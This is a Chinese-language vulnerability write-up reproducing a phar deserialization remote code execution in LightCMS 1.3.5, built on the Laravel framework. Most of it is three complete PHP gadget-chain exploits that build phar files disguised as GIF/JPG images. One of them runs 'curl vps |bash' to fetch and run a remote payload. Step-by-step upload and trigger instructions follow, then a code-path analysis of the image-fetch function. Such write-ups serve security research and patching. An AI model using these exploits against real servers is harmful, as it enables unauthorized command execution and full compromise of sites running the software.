环境搭建(Kali)
参考之间的文章:LightCMS1.3.5-任意文件读取&RCE漏洞
漏洞复现
找一个 Laravel RCE 的 gadget,生成 phar 文件,exp如下
POP_1
<?php
namespace Illuminate\\Broadcasting{
class PendingBroadcast
{
protected $events;
protected $event;
public function __construct($events, $event)
{
$this->events &#61; $events;
$this->event &#61; $event;
}
}
class BroadcastEvent
{
protected $connection;
public function __construct($connection)
{
$this->connection &#61; $connection;
}
}
}
namespace Illuminate\\Bus{
class Dispatcher{
protected $queueResolver;
public function __construct($queueResolver)
{
$this->queueResolver &#61; $queueResolver;
}
}
}
namespace{
$command &#61; new Illuminate\\Broadcasting\\BroadcastEvent(&#39;whoami&#39;);
$dispater &#61; new Illuminate\\Bus\\Dispatcher("system");
$PendingBroadcast &#61; new Illuminate\\Broadcasting\\PendingBroadcast($dispater,$command);
$phar &#61; new Phar(&#39;phar.phar&#39;);
$phar -> stopBuffering();
$phar->setStub("GIF89a"."");
$phar -> addFromString(&#39;test.txt&#39;,&#39;test&#39;);
$phar -> setMetadata($PendingBroadcast);
$phar -> stopBuffering();
rename(&#39;phar.phar&#39;,&#39;phar.jpg&#39;);
}
POP_2
<?php
namespace Illuminate\\Broadcasting
{
use Illuminate\\Events\\Dispatcher;
class PendingBroadcast
{
protected $events;
protected $event;
public function __construct($cmd)
{
$this->events &#61; new Dispatcher($cmd);
$this->event&#61;$cmd;
}
}
}
namespace Illuminate\\Events
{
class Dispatcher
{
protected $listeners;
public function __construct($event){
$this->listeners&#61;[$event&#61;>[&#39;system&#39;]];
}
}
}
namespace{
$phar &#61; new Phar(&#39;phar.phar&#39;);
$phar -> startBuffering();
$phar -> setStub(&#39;GIF89a&#39;.&#39;&#39;);
$o &#61; new Illuminate\\Broadcasting\\PendingBroadcast($argv[1]);
echo base64_encode(serialize($o));
$phar -> setMetadata($o);
$phar -> addFromString(&#39;test.txt&#39;,&#39;test&#39;);
$phar -> stopBuffering();
}
POP_3
<?php
namespace Illuminate\\Broadcasting{
class PendingBroadcast
{
protected $events;
protected $event;
public function __construct($events, $event)
{
$this->events &#61; $events;
$this->event &#61; $event;
}
}
class BroadcastEvent
{
protected $connection;
public function __construct($connection)
{
$this->connection &#61; $connection;
}
}
}
namespace Illuminate\\Bus{
class Dispatcher{
protected $queueResolver;
public function __construct($queueResolver)
{
$this->queueResolver &#61; $queueResolver;
}
}
}
namespace{
$command &#61; new Illuminate\\Broadcasting\\BroadcastEvent(&#39;curl vps |bash&#39;);
$dispater &#61; new Illuminate\\Bus\\Dispatcher("system");
$PendingBroadcast &#61; new Illuminate\\Broadcasting\\PendingBroadcast($dispater,$command);
$phar &#61; new Phar(&#39;phar.phar&#39;);
$phar -> stopBuffering();
$phar->setStub("GIF89a"."");
$phar -> addFromString(&#39;test.txt&#39;,&#39;test&#39;);
$phar -> setMetadata($PendingBroadcast);
$phar -> stopBuffering();
rename(&#39;phar.phar&#39;,&#39;phar.jpg&#39;);
}
来到内容管理 - 新增文章内容&#xff0c;上传文件&#xff0c;就会得到一个这样的图片 url&#xff1a;http://127.0.0.1:8000/upload/image/202106/qYUkjTWuFUMdMKo2hhp4DptwF23FkZJZ2nM1ixWy.gif
然后来到我们自己的 vps&#xff0c;新建一个 txt&#xff0c;内容为&#xff1a;phar://./upload/image/202106/qYUkjTWuFUMdMKo2hhp4DptwF23FkZJZ2nM1ixWy.gif
然后 POST 提交到这个路由即可触发 phar 反序列化
漏洞分析
在LightCMS1.3.5的任意文件读取漏洞被提出并且修复后&#xff0c;我们来分析一下作者修复所用的fetchImageFile
函数
跟进fetchImageFile
函数&#xff0c;可以看到其使用curl来获取远程资源的内容&#xff0c;然后使用 Image:make 模块进行解析&#xff0c;并且对后缀也进行了严格的过滤&#xff0c;由于该后台是基于laravel框架开发&#xff0c;并且这个cms 后台还是有图片上传功能的&#xff0c;不妨我们尝试利用phar反序列化实现RCE
我们跟进一下isWebp函数
&#xff0c;由于传入的不是Webp文件&#xff0c;所以会进入Image::make($data);
&#xff0c;而且这个data变量也就是请求返回的内容&#xff0c;在获取到远程url的内容后&#xff0c;会调用Intervention\\Image\\Facades\\Image
的 make方法&#xff0c;对图片内容进行解析
继续跟进到vendor/intervention/image/src/intervention/Image/AbstractDriver.php
&#xff0c;通过 init()
&#xff0c;然后传入 decoder->init()
可以看到 data 不仅可以是图片的二进制数据 &#xff0c;还可以是这些数据格式&#xff0c;跟进 initFromUrl
方法
它继续读取了这个 url 的内容&#xff0c;然后作为 binary 数据处理
跟进 isUrl
&#xff0c;这个方法只是利用 FILTER VAR 判断是否为 url&#xff0c;这意味着前面的 http 协议可以替换成其他协议&#xff0c;比如 phar 协议&#xff0c;将 url 内容改成一个 phar 进行测试&#xff0c;依旧进到了这里并且传给了 file_get_contents()&#xff0c;即可以触发 phar 反序列化
了